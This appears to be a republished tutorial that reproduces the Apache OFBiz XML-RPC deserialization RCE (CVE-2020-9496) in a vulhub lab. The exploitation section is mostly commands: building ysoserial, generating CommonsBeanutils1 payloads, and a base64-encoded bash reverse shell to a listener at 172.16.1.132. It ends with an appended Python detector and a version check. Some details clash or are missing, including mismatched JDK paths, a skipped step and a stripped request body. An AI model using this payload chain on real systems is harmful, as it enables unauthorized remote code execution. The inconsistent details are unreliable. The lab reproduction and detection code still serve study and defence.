SLTechnology News&Howtos > Network Security | Shulou (Shulou.com) report, 05/31; updated 2025-01-23
In this issue, the editor shows how to reproduce the Apache OFBiz XML-RPC RCE vulnerability CVE-2020-9496. The article is rich in content and analyzes the topic from a professional point of view; I hope you get something out of it.
0x00 Introduction
Apache OFBiz, in full The Apache Open For Business Project, is a well-known open-source e-commerce platform. It provides a framework for building medium and large enterprise-grade, multi-tier, distributed e-commerce web applications that are cross-database and cross-application-server, built on current J2EE/XML specifications and standards. OFBiz implements almost all of the J2EE core design patterns, its modules are loosely coupled, and users can easily take apart and recombine them according to their own needs, which makes it very flexible.
0x01 Vulnerability overview
Apache OFBiz contains a deserialization vulnerability: an attacker who can reach the unauthenticated XML-RPC interface can send a specially constructed XML-RPC HTTP request, which leads to remote code execution.
0x02 Affected versions
- Apache OFBiz < 17.12.04
0x03 Environment setup
1. This environment is built with vulhub. On a virtual machine with Docker installed, download it:
git clone https://github.com/vulhub/vulhub.git
2. Enter the vulnerability directory and use docker-compose to pull the vulnerable environment; a green "done" indicates success.
cd vulhub/ofbiz/CVE-2020-9496/
docker-compose up -d
3. Visit https://your-ip:8443/myportal/control/main in the browser to access the registration page
4. Install the environment needed to reproduce the vulnerability
4.1 Install the Java 8 environment
Download the JDK matching your system version from https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html
Create a folder and extract the downloaded Java archive into it.
mkdir /opt/java
tar zxvf jdk-8u251-linux-x64.tar.gz -C /opt/java
4.3 Add the Java environment variables
vim /etc/profile
Add at the end (the PATH line is needed so that the java -version check below finds this JDK):
export JAVA_HOME=/opt/java/jdk1.8.0_141
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH
4.4 Source the file so the variables take effect immediately, then check the Java version.
source /etc/profile
java -version
5. Install Maven: download it with wget
wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
mkdir /opt/maven
tar zxvf apache-maven-3.6.3-bin.tar.gz -C /opt/maven/
5.1 Configure the environment variables
vim /etc/profile
5.2 Add at the bottom:
export MAVEN_HOME=/opt/maven/apache-maven-3.6.3
export PATH=$MAVEN_HOME/bin:$PATH
5.3 Source the file so the variables take effect immediately, then check the Maven version.
source /etc/profile
mvn -version
0x04 Vulnerability reproduction
1. Download the Java deserialization tool ysoserial from GitHub
git clone https://github.com/frohoff/ysoserial.git
2. Enter the ysoserial directory and use Maven to download the dependencies and build the package; a successful build looks like the following screenshot.
mvn clean package -DskipTests
3. A target directory now exists inside the ysoserial directory. Enter it.
4. Visit the following URL in the browser, capture the request with Burp and send it to the Repeater module
https://your-ip:8443/webtools/control/xmlrpc
5. Replace the captured request with the following request
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
ProjectDiscovery
Test
[base64-payload]
6. Use the CommonsBeanutils1 gadget chain in ysoserial to generate a payload that writes a file in the /tmp directory
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
7. Copy the base64-encoded payload, paste it in place of base64payload in the Burp request, click Send, and check inside the Docker container whether the file was written.
8. Use the vulnerability to obtain a reverse shell. Go to the following URL to base64-encode the reverse-shell payload.
http://www.jackson-t.ca/runtime-exec-payloads.html
9. Wrap the encoded shell command with the ysoserial tool once more.
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMzIvMjI1OSAwPiYx} | {base64,-d} | {bash,-i}" | base64 | tr -d "\n"
10. Start an nc listener, put the generated payload into the Burp request and send it, then check the nc listener for the returned shell.
0x05 Remediation recommendation
1. Upgrading to the latest version is recommended.
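Upgrading is the fix; in the meantime a defender can confirm that the deployed release is at or above 17.12.04 and alert on POST requests to the XML-RPC endpoint whose body carries a base64-encoded Java serialized stream (the 0xACED0005 stream magic). The Python below is an added example written for this article, not code from the article or from Apache OFBiz; the request bodies are constructed samples, and the check is a coarse signature rather than a full XML-RPC parser.

```python
import base64
import re
from typing import Optional

# Endpoint abused in CVE-2020-9496 (taken from the article) and the magic bytes of a
# Java serialized stream (0xACED0005); base64 of that prefix always starts with "rO0AB".
XMLRPC_PATH = "/webtools/control/xmlrpc"
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
FIXED_VERSION = (17, 12, 4)  # first unaffected release, per the article


def contains_java_serialized_blob(body: str) -> bool:
    """True if any base64 run in the body decodes to a Java serialized stream."""
    for match in B64_RUN.finditer(body):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if raw.startswith(JAVA_SERIAL_MAGIC):
            return True
    return False


def flag_request(method: str, path: str, body: str) -> Optional[str]:
    """Return an alert reason for one HTTP request, or None if it looks benign."""
    if method.upper() != "POST" or path.split("?", 1)[0] != XMLRPC_PATH:
        return None
    if contains_java_serialized_blob(body):
        return "Java serialized object embedded in XML-RPC request to " + XMLRPC_PATH
    return None


def is_vulnerable_version(version: str) -> bool:
    """OFBiz releases older than 17.12.04 are affected; '17.12.03' -> True."""
    parts = tuple(int(p) for p in version.split("."))
    return parts < FIXED_VERSION


# Constructed samples (not real exploit traffic): the suspicious body carries a
# base64 blob that merely starts with the serialization magic bytes.
SAMPLE_BLOB = base64.b64encode(JAVA_SERIAL_MAGIC + b"constructed sample, not a gadget chain").decode()
SAMPLE_SUSPICIOUS = ("<?xml version='1.0'?><methodCall><methodName>demo</methodName>"
                     f"<params><param><value>{SAMPLE_BLOB}</value></param></params></methodCall>")
SAMPLE_BENIGN = ("<?xml version='1.0'?><methodCall><methodName>demo</methodName>"
                 "<params><param><value><string>hello world</string></value></param></params></methodCall>")

if __name__ == "__main__":
    print(flag_request("POST", XMLRPC_PATH, SAMPLE_SUSPICIOUS))  # alert reason
    print(flag_request("POST", XMLRPC_PATH, SAMPLE_BENIGN))      # None
    print(is_vulnerable_version("17.12.03"), is_vulnerable_version("17.12.04"))  # True False
```

Run it against a request log or a WAF body capture by feeding each request's method, path and body to flag_request; the same signature is easy to express as a WAF rule on the base64 prefix rO0AB.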
The above is the editor's walkthrough of how to reproduce the Apache OFBiz XML-RPC RCE vulnerability CVE-2020-9496. If you have similar questions, you may refer to the analysis above; if you want to know more, you are welcome to follow the industry information channel.